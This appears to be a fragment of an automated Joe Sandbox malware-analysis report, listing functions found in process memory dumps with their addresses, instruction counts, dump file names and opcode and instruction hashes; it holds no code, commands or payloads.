                                                                • Opcode ID: 5840922a9da632653530fc6bc2c3fd3a2183d2c8a1676780818ecd50479203c0
                                                                • Instruction ID: 4be138043f897830aad367c1cc748b37d0f30882d20c201d6113c49831ca7d24
                                                                • Opcode Fuzzy Hash: 5840922a9da632653530fc6bc2c3fd3a2183d2c8a1676780818ecd50479203c0
                                                                • Instruction Fuzzy Hash: 8EE08634909214EFC704DF94D5515ACBF75AB46308F10919CC80817342C6314E56DB81
                                                                Function 06E20108 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f2f88bfabf1f88cc61061612043be016a62a590120a4ad1f997370db7bec0b5
                                                                • Instruction ID: c52ecd5bc024a307cb91171d33a04d54a85fbe23753db2e17d0c9a85ac901532
                                                                • Opcode Fuzzy Hash: 3f2f88bfabf1f88cc61061612043be016a62a590120a4ad1f997370db7bec0b5
                                                                • Instruction Fuzzy Hash: ECE01234D09218EFDB44DF94E9515ACBBB9EB45319F10919DD80827382CA329E56DB81
                                                                Function 0714E358 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4e42067bbb7fc8cccfc934e5f583b0661ab810a7eed349f5e563b3f068a3b34
                                                                • Instruction ID: 60eafac6bd4307b9e75a04478760c4fab2051d942414dbe295374934c5284662
                                                                • Opcode Fuzzy Hash: e4e42067bbb7fc8cccfc934e5f583b0661ab810a7eed349f5e563b3f068a3b34
                                                                • Instruction Fuzzy Hash: AFE012B4949108EFC709DF94D5415ACBBB8FB46715F10C19DD80827391CB329E56DB81
                                                                Function 06C8FD20 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d8bcc07964efbea929a1f17ac2acadd53dcaee6bdad2f078f014b830195a1ff
                                                                • Instruction ID: c0d745b4d4435398d6bace1116faab1c3238ff3c4bae3b22cc7800cefd7d29eb
                                                                • Opcode Fuzzy Hash: 7d8bcc07964efbea929a1f17ac2acadd53dcaee6bdad2f078f014b830195a1ff
                                                                • Instruction Fuzzy Hash: DFE08C70C0520CDFC790EFA8D90569CBBF8AB08205F1000A98A08E3200E6704A40CB41
                                                                Function 06C862F0 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e2c2c1153418d59786c55d90b797baa1a4a188b2eb1150d2f691b48a400b003b
                                                                • Instruction ID: 65df412a1d1a2fc566d54da30373650dd7b97a265df23db6b304ea9fd1571dcb
                                                                • Opcode Fuzzy Hash: e2c2c1153418d59786c55d90b797baa1a4a188b2eb1150d2f691b48a400b003b
                                                                • Instruction Fuzzy Hash: 4DE0C2B084120CDFCB51EFB4C904A9EBBFCDF05200F0005A9950493110E9314E14D7A2
                                                                Function 06C68E30 Relevance: .0, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da374e7fe1f5f40b2445211e5bbe58007980d27c5fdf6aaf0d6e37e024a2e3e7
                                                                • Instruction ID: a8345408fa65f406c0e6dfe90b8ba1c32ea54ea260acc4516b14d33260f325da
                                                                • Opcode Fuzzy Hash: da374e7fe1f5f40b2445211e5bbe58007980d27c5fdf6aaf0d6e37e024a2e3e7
                                                                • Instruction Fuzzy Hash: B6E0C23084220CDFC751EFB4C904A9E7BFDDF04200F4004A9900897110EA314E10D7F1
                                                                Function 06E21360 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c79c7d914206d62f4b74c56e5aa41568065f41516d4bdc37928a5a4b09aadf2a
                                                                • Instruction ID: ef64e1521c8dc07660d2275dd32dc5107a9baa51fd237101aef3c96f0d283361
                                                                • Opcode Fuzzy Hash: c79c7d914206d62f4b74c56e5aa41568065f41516d4bdc37928a5a4b09aadf2a
                                                                • Instruction Fuzzy Hash: 13E0C230805318DFC740DFA8C5152ECBFB5EB0A205F1480D9D84857342D6329F02DB80
                                                                Function 06E21359 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8a76cc821617a7d18acc7664c68a1ee9d25702ce4ad8b85ccdb08395b4894815
                                                                • Instruction ID: 03e9351dd03db462c862cb8bc266a322126aba9400da69d4b63d3ca8f6304ed3
                                                                • Opcode Fuzzy Hash: 8a76cc821617a7d18acc7664c68a1ee9d25702ce4ad8b85ccdb08395b4894815
                                                                • Instruction Fuzzy Hash: 3EE0C230809214DFDB80CFA8C5192FCBFB2FB0A215F1580D9D80857341C6328F02DB40
                                                                Function 06E2135D Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 312c113eaa21a23a2e04e5f1706a2974510de6305375eb85f86a9726382523b3
                                                                • Instruction ID: 34cbd854f6821fb28c382af8a190a1e63081fcd3e8b875cfc7105778d1d2e1ca
                                                                • Opcode Fuzzy Hash: 312c113eaa21a23a2e04e5f1706a2974510de6305375eb85f86a9726382523b3
                                                                • Instruction Fuzzy Hash: 87E08C30C05215DFDB44DBA8C9186ACBFB5AB0A225F148299D828672D2D6328B42DB50
                                                                Function 06C69280 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d42c6c8c0141d3a1be5b90b679d7c81b071ef6b804a472fc3cec58f1b7964c75
                                                                • Instruction ID: 814152a8a93e94d2f9e8e626259a4ee4659afbc215d45f63ee25db9b21b0d122
                                                                • Opcode Fuzzy Hash: d42c6c8c0141d3a1be5b90b679d7c81b071ef6b804a472fc3cec58f1b7964c75
                                                                • Instruction Fuzzy Hash: CBD0A734509108DFD754CF96D545AACB7BCDB46315F14809CAC0C57342CA339E02DB85
                                                                Function 06C69E88 Relevance: .0, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d42c6c8c0141d3a1be5b90b679d7c81b071ef6b804a472fc3cec58f1b7964c75
                                                                • Instruction ID: 32fdea9490d888dcea9181dcb7f3137d54f077ca8c1806c6c836402459fe997c
                                                                • Opcode Fuzzy Hash: d42c6c8c0141d3a1be5b90b679d7c81b071ef6b804a472fc3cec58f1b7964c75
                                                                • Instruction Fuzzy Hash: 89D0A738509108DFD754CF95D541A69F7BCEB46315F10809DA80C57352CB339E01DBC4
                                                                Function 06C65630 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ad4e531709574dea3d05e6a2834df455cb1d5c2eda3122a66a4682418003c91
                                                                • Instruction ID: 10f198c8dcaf2c4b1dc3d1883b07f0e43d1c01c7e7db55ed6b8fe9a528e5efee
                                                                • Opcode Fuzzy Hash: 8ad4e531709574dea3d05e6a2834df455cb1d5c2eda3122a66a4682418003c91
                                                                • Instruction Fuzzy Hash: 34D0A93A8092409FC3868E60CC61800BBA4AB96300369C49BA018CF252C6238D07C7DA
                                                                Function 06E20D5D Relevance: .0, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204607304.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6e20000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ff79a85a4c1dcd89512902ecfe9570370e111bf1ed2fcb7b1ef63e365fb114f
                                                                • Instruction ID: 81fd3a3c5ac664be768d833458519098f8c26efc085c00735223a07291ca6e86
                                                                • Opcode Fuzzy Hash: 3ff79a85a4c1dcd89512902ecfe9570370e111bf1ed2fcb7b1ef63e365fb114f
                                                                • Instruction Fuzzy Hash: 51E082B4E0630ACFCB45DF94E04479D73B6FB41300F10246AE20AAB284CB34AE80CF00
                                                                Function 06C6CEF7 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204013199.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c60000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5bea779adc6cc7ebc9c5f370c9fe114c97bacd0db7853df3c0f9b30cd1ea729
                                                                • Instruction ID: 720b428007ba6d03b70fc9f2a5d48e93dfcc76e29af004a36f2b9d90b7ce6d27
                                                                • Opcode Fuzzy Hash: f5bea779adc6cc7ebc9c5f370c9fe114c97bacd0db7853df3c0f9b30cd1ea729
                                                                • Instruction Fuzzy Hash: AAE01274A05208CFE751CF65C8847DE7BB1FB49300F449465E105BB244C7344A80CF51
                                                                Function 0714E738 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204883280.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_7130000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7a134edc4456c39626eab3f89d99a50d6c7b4a2402de7dcbc47e0b9f4b94bb6
                                                                • Instruction ID: eb441ede2ae1e0af21f770f5ba3d88f2e6b19cf67a169c0e99d482ff75d62c2a
                                                                • Opcode Fuzzy Hash: e7a134edc4456c39626eab3f89d99a50d6c7b4a2402de7dcbc47e0b9f4b94bb6
                                                                • Instruction Fuzzy Hash: D8C02BB005B20A8EE2172744610D3757AACB70B337F492820560D00093C7714418C691
                                                                Function 06C8AC51 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4d09521bdc6db83fefef06214a09c9590f7533ffed420c287b89a76fc494a6fd
                                                                • Instruction ID: 97b90db52d72efa00653ebaab21376e34a0f42f60fc6cbcc5815336c205adbca
                                                                • Opcode Fuzzy Hash: 4d09521bdc6db83fefef06214a09c9590f7533ffed420c287b89a76fc494a6fd
                                                                • Instruction Fuzzy Hash: E0D05E709443088FDB609F28EC4479D3BB8AB04309F0082A040089B385CB7849448F80
                                                                Function 06C88E86 Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2204124984.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6c80000_TypeName.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38685dc9d601fe4273feef9739bb48619c2f054eebeb26ac24935710e0025c5c
                                                                • Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
                                                                • Opcode Fuzzy Hash: 38685dc9d601fe4273feef9739bb48619c2f054eebeb26ac24935710e0025c5c
                                                                • Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50